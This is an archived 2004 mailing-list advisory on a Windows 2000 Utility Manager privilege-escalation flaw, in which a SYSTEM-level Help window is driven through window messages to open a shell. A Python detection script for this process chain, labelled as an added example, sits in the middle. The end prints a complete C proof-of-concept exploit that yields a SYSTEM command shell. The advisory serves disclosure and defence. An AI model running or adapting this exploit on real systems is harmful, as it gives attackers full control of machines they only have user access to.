[VulnWatch] [SHATTER Team Security Alert] Microsoft Windows Utility Manager Vulnerability

From: Vivek Rathod (Application Security, Inc.) (vrathod_at_appsecinc.com)
Date: 04/15/04

  • Next message: spiffomatic 64: "[Full-Disclosure] SCT javascript execution vulnerability"
    Date: Thu, 15 Apr 2004 11:45:52 -0400
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org
    
    Microsoft Windows Utility Manager Vulnerability

    April 13, 2004

    Risk Level: High

    Summary:
    A local elevation of privilege vulnerability in the Windows Utility Manager
    allows any user who can log on interactively to take complete control of
    the operating system.

    Versions Affected:
    All products in the Windows 2000 operating system family.

    Details:
    Microsoft Windows 2000 includes support for Accessibility options. Accessibility
    support is a set of assistive technologies that allow users with disabilities to
    use the functions of the operating system. It is enabled or disabled through
    keyboard shortcuts built into the operating system, or through the Accessibility
    Utility Manager. The Utility Manager lets users check the status of the
    Accessibility programs (Magnifier, Narrator, On-Screen Keyboard) and start or
    stop them. It is invoked by pressing Windows Key + U or by executing
    "utilman.exe /start" from the command line. The Utility Manager service is
    enabled by default and runs on the interactive desktop with Local System
    privileges.

    The Utility Manager supports context-sensitive help. Users access it by clicking
    the "?" on the title bar and then a control, or by pressing F1 with a control
    selected. To display the help, Utility Manager launches winhlp32.exe without
    dropping its System privileges, so winhlp32.exe runs under the Local System
    account. Because winhlp32.exe then has a window on the same interactive desktop
    as the logged-on user, any process of that user can send it window messages,
    which exposes it to "Shatter"-style attacks: Win32 window messaging performs no
    privilege check between windows that share a desktop.

    Winhlp32.exe is started with its main window hidden, but making it visible is
    trivial. Once the window is visible, a typical attack drives its "File Open"
    dialog to run a program such as cmd.exe. Since the Help window runs as Local
    System, the program it launches inherits the same privileges.
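    The attack chain described above (a SYSTEM utilman.exe launches winhlp32.exe,
    whose File Open dialog is then driven to spawn cmd.exe, also as SYSTEM) is
    visible in ordinary process-creation telemetry even though the window messages
    themselves leave no trace. The detection logic below is an added example and is
    not part of the AppSecInc advisory or its proof of concept. It runs over a
    constructed list of process-creation records; the field names (pid, ppid,
    image, user) are assumptions for the example, not a real product schema. It
    flags every child of a winhlp32.exe that is running as Local System, rates a
    shell child high, and records whether the ancestry passes through utilman.exe.

```python
from dataclasses import dataclass
from typing import Dict, List

SYSTEM_USER = "NT AUTHORITY\\SYSTEM"
LAUNCHER = "utilman.exe"      # Utility Manager service process (runs as Local System)
HELP_VIEWER = "winhlp32.exe"  # launched by utilman.exe without dropping privileges
SHELLS = {"cmd.exe", "command.com"}


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record. Field names are an assumption for this
    example, not a real telemetry schema; image is the lower-case basename."""
    pid: int
    ppid: int
    image: str
    user: str


def ancestry(tree: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Walk parent links upward from pid; stops at an unknown pid or a loop
    (pid reuse can make ppid chains circular in replayed telemetry)."""
    chain: List[ProcEvent] = []
    seen = set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        chain.append(tree[pid])
        pid = tree[pid].ppid
    return chain


def detect(events: List[ProcEvent]) -> List[dict]:
    """Report every child of a winhlp32.exe that is running as Local System.

    A Help viewer has no business creating processes while it runs as SYSTEM,
    so any child is suspicious; a shell is the advisory's attack and is rated
    high. Children of a winhlp32.exe running as the interactive user are
    ignored: there the attacker gains no privilege."""
    tree = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = tree.get(e.ppid)
        if parent is None or parent.image != HELP_VIEWER or parent.user != SYSTEM_USER:
            continue
        images = [p.image for p in ancestry(tree, e.ppid)]   # parent, grandparent, ...
        if e.image in SHELLS:
            rule, severity = "system-winhlp32-spawned-shell", "high"
        else:
            rule, severity = "system-winhlp32-spawned-child", "medium"
        findings.append({
            "pid": e.pid,
            "image": e.image,
            "rule": rule,
            "severity": severity,
            "via_utilman": LAUNCHER in images,
            "chain": " <- ".join([e.image] + images),
        })
    return findings


# Constructed sample telemetry (not captured from a real host).
SAMPLE_EVENTS = [
    ProcEvent(4,   0,   "system",       SYSTEM_USER),
    ProcEvent(200, 4,   "services.exe", SYSTEM_USER),
    ProcEvent(300, 200, "utilman.exe",  SYSTEM_USER),           # Utility Manager service
    ProcEvent(310, 300, "winhlp32.exe", SYSTEM_USER),           # context help, still SYSTEM
    ProcEvent(320, 310, "cmd.exe",      SYSTEM_USER),           # launched via File > Open
    ProcEvent(330, 310, "notepad.exe",  SYSTEM_USER),           # unexpected, not a shell
    ProcEvent(250, 4,   "winlogon.exe", SYSTEM_USER),
    ProcEvent(400, 250, "explorer.exe", "WORKSTATION\\alice"),
    ProcEvent(410, 400, "winhlp32.exe", "WORKSTATION\\alice"),  # user's own Help session
    ProcEvent(420, 410, "cmd.exe",      "WORKSTATION\\alice"),  # no privilege gain: ignored
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']} pid={f['pid']} "
              f"via_utilman={f['via_utilman']}: {f['chain']}")
```

    Run stand-alone, it reports the two children of the SYSTEM winhlp32.exe in the
    sample; the winhlp32.exe that alice started herself also spawns cmd.exe but is
    not reported, because its parent is not Local System and no privilege is gained.
    The rule is keyed on the parent's account and image rather than on window
    titles or message identifiers, which are under the attacker's control.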

    Further information is available at:
    http://www.appsecinc.com/resources/alerts/general/04-0001.html
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
    http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

    Fix:
    http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en

    Acknowledgments:
    Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application
    Security, Inc. (http://www.appsecinc.com) and to
    Brett Moore of Security-Assessment.com (http://security-assessment.com).

    Please find the proof-of-concept exploit code attached

    ___________________________________________
    AppSecInc Team SHATTER
    Tel: 1-866-927-7732
    E-mail: shatter@appsecinc.com
    Web: www.appsecinc.com

    Application Security, Inc.
    "Securing Business by Securing Enterprise Applications"

    
    // By Cesar Cerrudo (cesar@appsecinc.com)
    // Local elevation of privileges exploit for Windows Utility Manager
    // Gives you a shell with system privileges
    // If you have problems try changing the Sleep() values.

    #include <stdio.h>
    #include <windows.h>
    #include <commctrl.h>
    #include <Winuser.h>

    int main(int argc, char *argv[])
    {
      HWND lHandle, lHandle2;
      POINT point;

      char sText[]="%windir%\\system32\\cmd.ex?";

      // run utility manager
      system("utilman.exe /start");
      Sleep(500);

      // execute contextual help
      SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
      Sleep(500);

      // open the File Open dialog window in Windows Help
      PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
      Sleep(500);

      // find open file dialog window
      lHandle = FindWindow("#32770","Open");

      // get input box handle
      lHandle2 = GetDlgItem(lHandle, 0x47C);
      Sleep(500);

      // set text to filter listview to display only cmd.exe
      SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
      Sleep(800);

      // send return
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

      //get navigation bar handle
      lHandle2 = GetDlgItem(lHandle, 0x4A0);
      //send tab
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
      Sleep(500);
      lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
      //get list view handle
      lHandle2 = GetDlgItem(lHandle2, 0x1);

      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
      Sleep(500);
      
      // popup context menu
      PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
      Sleep(1000);

      // get context menu handle
      point.x =10; point.y =30;
      lHandle2=WindowFromPoint(point);

      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

      SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

      return(0);
    }
